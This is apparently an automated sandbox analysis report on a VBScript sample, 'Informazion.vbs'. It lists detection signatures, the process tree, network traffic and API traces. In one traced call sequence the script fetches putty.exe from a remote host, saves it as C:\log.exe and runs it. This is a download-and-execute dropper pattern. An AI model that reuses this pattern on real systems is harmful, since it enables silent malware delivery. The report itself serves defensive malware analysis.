Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Informazion.vbs

Overview

General Information

Sample Name:Informazion.vbs
Analysis ID:783911
MD5:63a02673549906ceb1945b6503e586e2
SHA1:1699cc8e7a12a5c26f69d8157ddc05bf7926fca0
SHA256:ecaaf6651becfa0901ce06fcb3ec0f933233cec66f41ab680ff42d1d9ffd06e2
Tags:agenziaentrategoziisfbtestingursnifvbs
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Benign windows process drops PE files
VBScript performs obfuscated calls to suspicious functions
System process connects to network (likely due to code injection or exploit)
Potential malicious VBS script found (has network functionality)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 4180 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Informazion.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • log.exe (PID: 1836 cmdline: "C:\log.exe" MD5: AEB47B393079D8C92169F1EF88DD5696)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: Informazion.vbsVirustotal: Detection: 15%Perma Link
Source: unknownHTTPS traffic detected: 93.93.131.124:443 -> 192.168.2.3:49699 version: TLS 1.2
Source: C:\log.exeCode function: 1_2_00BD8B60 GetWindowsDirectoryA,_strlen,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,GetCurrentProcessId,1_2_00BD8B60
Source: C:\log.exeCode function: 1_2_00C04B20 FindFirstFileA,FindClose,1_2_00C04B20
Source: C:\log.exeCode function: 1_2_00C68F62 FindFirstFileExW,1_2_00C68F62
Source: C:\log.exeCode function: 1_2_00C69013 FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00C69013
Source: C:\log.exeCode function: 4x nop then movzx ebp, byte ptr [edi]1_2_00C1A060
Source: C:\log.exeCode function: 4x nop then push ecx1_2_00C141F0
Source: C:\log.exeCode function: 4x nop then mov ecx, ebp1_2_00C202F0
Source: C:\log.exeCode function: 4x nop then push ecx1_2_00BE8420
Source: C:\log.exeCode function: 4x nop then push 00000001h1_2_00BFC7D0
Source: C:\log.exeCode function: 4x nop then push ebx1_2_00C32730
Source: C:\log.exeCode function: 4x nop then sub edx, 01h1_2_00BCA8D0
Source: C:\log.exeCode function: 4x nop then mov dword ptr [esp+0Ch], edx1_2_00C2E800
Source: C:\log.exeCode function: 4x nop then mov byte ptr [eax+esi*4+07h], 00000004h1_2_00BB4877
Source: C:\log.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+ebp]1_2_00C2C9F0
Source: C:\log.exeCode function: 4x nop then mov eax, dword ptr [esi+08h]1_2_00BCC97D
Source: C:\log.exeCode function: 4x nop then mov edx, dword ptr [edi+ebx*4]1_2_00BBE970
Source: C:\log.exeCode function: 4x nop then mov edi, edx1_2_00C18A20
Source: C:\log.exeCode function: 4x nop then mov ecx, dword ptr [edi+04h]1_2_00C18B40
Source: C:\log.exeCode function: 4x nop then mov ecx, dword ptr [esp+eax*8]1_2_00C3CDF0
Source: C:\log.exeCode function: 4x nop then sub esi, 03h1_2_00C20FC0
Source: C:\log.exeCode function: 4x nop then mov eax, dword ptr [edi+ebp*4+04h]1_2_00BD2FA0
Source: C:\log.exeCode function: 4x nop then cmp byte ptr [edi+ebx], 0000002Ch1_2_00BFCF40
Source: C:\log.exeCode function: 4x nop then mov ecx, dword ptr [eax-08h]1_2_00BD50A0
Source: C:\log.exeCode function: 4x nop then movzx ebx, word ptr [ecx+edx*2]1_2_00C350F0
Source: C:\log.exeCode function: 4x nop then push dword ptr [edi+10h]1_2_00C130B0
Source: C:\log.exeCode function: 4x nop then mov ecx, edx1_2_00BEB030
Source: C:\log.exeCode function: 4x nop then mov esi, 00000000h1_2_00C1F1E0

Networking

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exeDomain query: the.earth.li
Source: C:\Windows\System32\wscript.exeNetwork Connect: 93.93.131.124 443Jump to behavior
Potential malicious VBS script found (has network functionality)
Source: Initial file: .write xHttp.responseBody
Source: Initial file: .savetofile Fileopen, 2
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox ViewIP Address: 93.93.131.124 93.93.131.124
Source: global trafficHTTP traffic detected: GET /~sgtatham/putty/latest/w32/putty.exe HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: the.earth.liConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /~sgtatham/putty/0.78/w32/putty.exe HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: the.earth.liConnection: Keep-Alive
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: wscript.exe, 00000000.00000003.263625121.0000023B7B775000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.263369167.0000023B7B76C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264712055.0000023B7B776000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.262118520.0000023B7B76B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
Source: wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
Source: wscript.exe, 00000000.00000003.261760989.0000023B7920F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.259955317.0000023B79202000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264226147.0000023B79212000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.263516890.0000023B79211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drString found in binary or memory: https://sectigo.com/CPS0
Source: wscript.exe, 00000000.00000003.259955317.0000023B791E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264134456.0000023B791E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://the.earth.li/
Source: wscript.exe, 00000000.00000003.259955317.0000023B791E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264134456.0000023B791E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://the.earth.li/U
Source: wscript.exe, 00000000.00000003.263625121.0000023B7B7A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://the.earth.li/~sgtatham/putty/0.78/w32/putty.exe
Source: wscript.exe, 00000000.00000002.264299976.0000023B793E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264497492.0000023B7AEA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264497492.0000023B7AEA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.262004458.0000023B79172000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261886523.0000023B79165000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.263066389.0000023B7B165000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261715375.0000023B791BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264039206.0000023B79173000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264058897.0000023B791BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.263997397.0000023B79148000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264027516.0000023B79167000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264134456.0000023B791E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.263298778.0000023B791BD000.00000004.00000020.00020000.00000000.sdmp, Informazion.vbsString found in binary or memory: https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe
Source: wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.262590206.0000023B7B860000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BD22000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260156905.0000023B7BD22000.00000004.00000020.00020000.00000000.sdmp, log.exe, log.exe, 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp, log.exe, 00000001.00000003.260463652.0000000003081000.00000004.00000020.00020000.00000000.sdmp, log.exe, 00000001.00000000.259191390.0000000000C77000.00000002.00000001.01000000.00000007.sdmp, log.exe.0.dr, putty[1].exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/
Source: wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: wscript.exe, 00000000.00000003.262590206.0000023B7B860000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/host/:/0123456789abcdefghijklmnopqrstuvwxyzABCDEF
Source: unknownDNS traffic detected: queries for: the.earth.li
Source: C:\log.exeCode function: 1_2_00BE66A0 recv,accept,WSAGetLastError,closesocket,recv,ioctlsocket,WSAGetLastError,recv,WSAGetLastError,1_2_00BE66A0
Source: global trafficHTTP traffic detected: GET /~sgtatham/putty/latest/w32/putty.exe HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: the.earth.liConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /~sgtatham/putty/0.78/w32/putty.exe HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: the.earth.liConnection: Keep-Alive
Source: unknownHTTPS traffic detected: 93.93.131.124:443 -> 192.168.2.3:49699 version: TLS 1.2
Source: C:\log.exeCode function: 1_2_00BBA910 GetKeyboardState,1_2_00BBA910
Source: C:\log.exeCode function: 1_2_00BB60F0 GlobalAlloc,GlobalLock,GlobalUnlock,SendMessageA,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,SendMessageA,GlobalFree,1_2_00BB60F0
Source: C:\log.exeCode function: 1_2_00BCE0F01_2_00BCE0F0
Source: C:\log.exeCode function: 1_2_00BC00301_2_00BC0030
Source: C:\log.exeCode function: 1_2_00C1A0601_2_00C1A060
Source: C:\log.exeCode function: 1_2_00C281001_2_00C28100
Source: C:\log.exeCode function: 1_2_00C3C1201_2_00C3C120
Source: C:\log.exeCode function: 1_2_00C2E2801_2_00C2E280
Source: C:\log.exeCode function: 1_2_00C3E2901_2_00C3E290
Source: C:\log.exeCode function: 1_2_00BEA2D01_2_00BEA2D0
Source: C:\log.exeCode function: 1_2_00BC22401_2_00BC2240
Source: C:\log.exeCode function: 1_2_00C403D01_2_00C403D0
Source: C:\log.exeCode function: 1_2_00C4A3F01_2_00C4A3F0
Source: C:\log.exeCode function: 1_2_00BC63F01_2_00BC63F0
Source: C:\log.exeCode function: 1_2_00C563AB1_2_00C563AB
Source: C:\log.exeCode function: 1_2_00C184A01_2_00C184A0
Source: C:\log.exeCode function: 1_2_00C364601_2_00C36460
Source: C:\log.exeCode function: 1_2_00C2E4701_2_00C2E470
Source: C:\log.exeCode function: 1_2_00C366901_2_00C36690
Source: C:\log.exeCode function: 1_2_00BD06601_2_00BD0660
Source: C:\log.exeCode function: 1_2_00C126201_2_00C12620
Source: C:\log.exeCode function: 1_2_00C347D01_2_00C347D0
Source: C:\log.exeCode function: 1_2_00C387701_2_00C38770
Source: C:\log.exeCode function: 1_2_00BC22401_2_00BC2240
Source: C:\log.exeCode function: 1_2_00BB88D01_2_00BB88D0
Source: C:\log.exeCode function: 1_2_00BCA8D01_2_00BCA8D0
Source: C:\log.exeCode function: 1_2_00C2E8001_2_00C2E800
Source: C:\log.exeCode function: 1_2_00C1C9F01_2_00C1C9F0
Source: C:\log.exeCode function: 1_2_00C369201_2_00C36920
Source: C:\log.exeCode function: 1_2_00C08B401_2_00C08B40
Source: C:\log.exeCode function: 1_2_00C1AB101_2_00C1AB10
Source: C:\log.exeCode function: 1_2_00C4CD901_2_00C4CD90
Source: C:\log.exeCode function: 1_2_00C4ED001_2_00C4ED00
Source: C:\log.exeCode function: 1_2_00C4AD001_2_00C4AD00
Source: C:\log.exeCode function: 1_2_00C52D271_2_00C52D27
Source: C:\log.exeCode function: 1_2_00C2CD201_2_00C2CD20
Source: C:\log.exeCode function: 1_2_00BC0E901_2_00BC0E90
Source: C:\log.exeCode function: 1_2_00BBCFB01_2_00BBCFB0
Source: C:\log.exeCode function: 1_2_00C34F701_2_00C34F70
Source: C:\log.exeCode function: 1_2_00C2CF201_2_00C2CF20
Source: C:\log.exeCode function: 1_2_00C290C01_2_00C290C0
Source: C:\log.exeCode function: 1_2_00C3D0801_2_00C3D080
Source: C:\log.exeCode function: 1_2_00C2D0A01_2_00C2D0A0
Source: C:\log.exeCode function: 1_2_00BEB0301_2_00BEB030
Source: C:\log.exeCode function: 1_2_00C1D0501_2_00C1D050
Source: C:\log.exeCode function: 1_2_00C050601_2_00C05060
Source: C:\log.exeCode function: 1_2_00C4D0201_2_00C4D020
Source: C:\log.exeCode function: String function: 00BEE7A0 appears 46 times
Source: C:\log.exeCode function: String function: 00C60D80 appears 56 times
Source: C:\log.exeCode function: String function: 00C5D413 appears 306 times
Source: C:\log.exeCode function: String function: 00BE8630 appears 244 times
Source: C:\log.exeCode function: String function: 00BE3820 appears 149 times
Source: C:\log.exeCode function: String function: 00BB69A0 appears 33 times
Source: Informazion.vbsInitial sample: Strings found which are bigger than 50
Source: Informazion.vbsVirustotal: Detection: 15%
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Informazion.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\log.exe "C:\log.exe"
Source: C:\Windows\System32\wscript.exeProcess created: C:\log.exe "C:\log.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4Jump to behavior
Source: classification engineClassification label: mal76.evad.winVBS@3/2@1/1
Source: C:\log.exeCode function: 1_2_00BD4230 CoCreateInstance,1_2_00BD4230
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\log.exeCode function: 1_2_00BECC90 FormatMessageA,_strlen,GetLastError,1_2_00BECC90
Source: C:\log.exeCode function: 1_2_00BBB1F0 FindResourceA,1_2_00BBB1F0
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Informazion.vbs"
Source: log.exeString found in binary or memory: config-serial-stopbits
Source: log.exeString found in binary or memory: source-address
Source: log.exeString found in binary or memory: config-ssh-portfwd-address-family
Source: log.exeString found in binary or memory: config-address-family
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\log.exeWindow detected: Number of UI elements: 20

Data Obfuscation

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.Environment("Process");IWshEnvironment.Item("%systemroot%\\System32\\LogFiles\\");_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("\log.exe", "2");IWshShell3.Run("\log.exe", "1")
Source: putty[1].exe.0.drStatic PE information: section name: .00cfg
Source: putty[1].exe.0.drStatic PE information: section name: .voltbl
Source: log.exe.0.drStatic PE information: section name: .00cfg
Source: log.exe.0.drStatic PE information: section name: .voltbl
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\putty[1].exeJump to dropped file
Source: C:\Windows\System32\wscript.exeFile created: C:\log.exeJump to dropped file
Source: C:\log.exeCode function: 1_2_00BB82E0 IsIconic,SetWindowTextW,SetWindowTextA,1_2_00BB82E0
Source: C:\log.exeCode function: 1_2_00BB8230 IsIconic,SetWindowTextW,SetWindowTextA,1_2_00BB8230
Source: C:\log.exeCode function: 1_2_00BB8390 IsIconic,ShowWindow,1_2_00BB8390
Source: C:\log.exeCode function: 1_2_00BB46E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoInitialize,MessageBoxA,1_2_00BB46E0
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\log.exeAPI coverage: 6.4 %
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\log.exeCode function: 1_2_00BD8B60 GetWindowsDirectoryA,_strlen,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,GetCurrentProcessId,1_2_00BD8B60
Source: C:\log.exeCode function: 1_2_00C04B20 FindFirstFileA,FindClose,1_2_00C04B20
Source: C:\log.exeCode function: 1_2_00C68F62 FindFirstFileExW,1_2_00C68F62
Source: C:\log.exeCode function: 1_2_00C69013 FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00C69013
Source: wscript.exe, 00000000.00000003.259955317.0000023B79202000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.263516890.0000023B7922C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261760989.0000023B7922C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.259955317.0000023B7922C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264134456.0000023B79202000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264226147.0000023B7922C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.259955317.0000023B791E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264134456.0000023B791E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW R
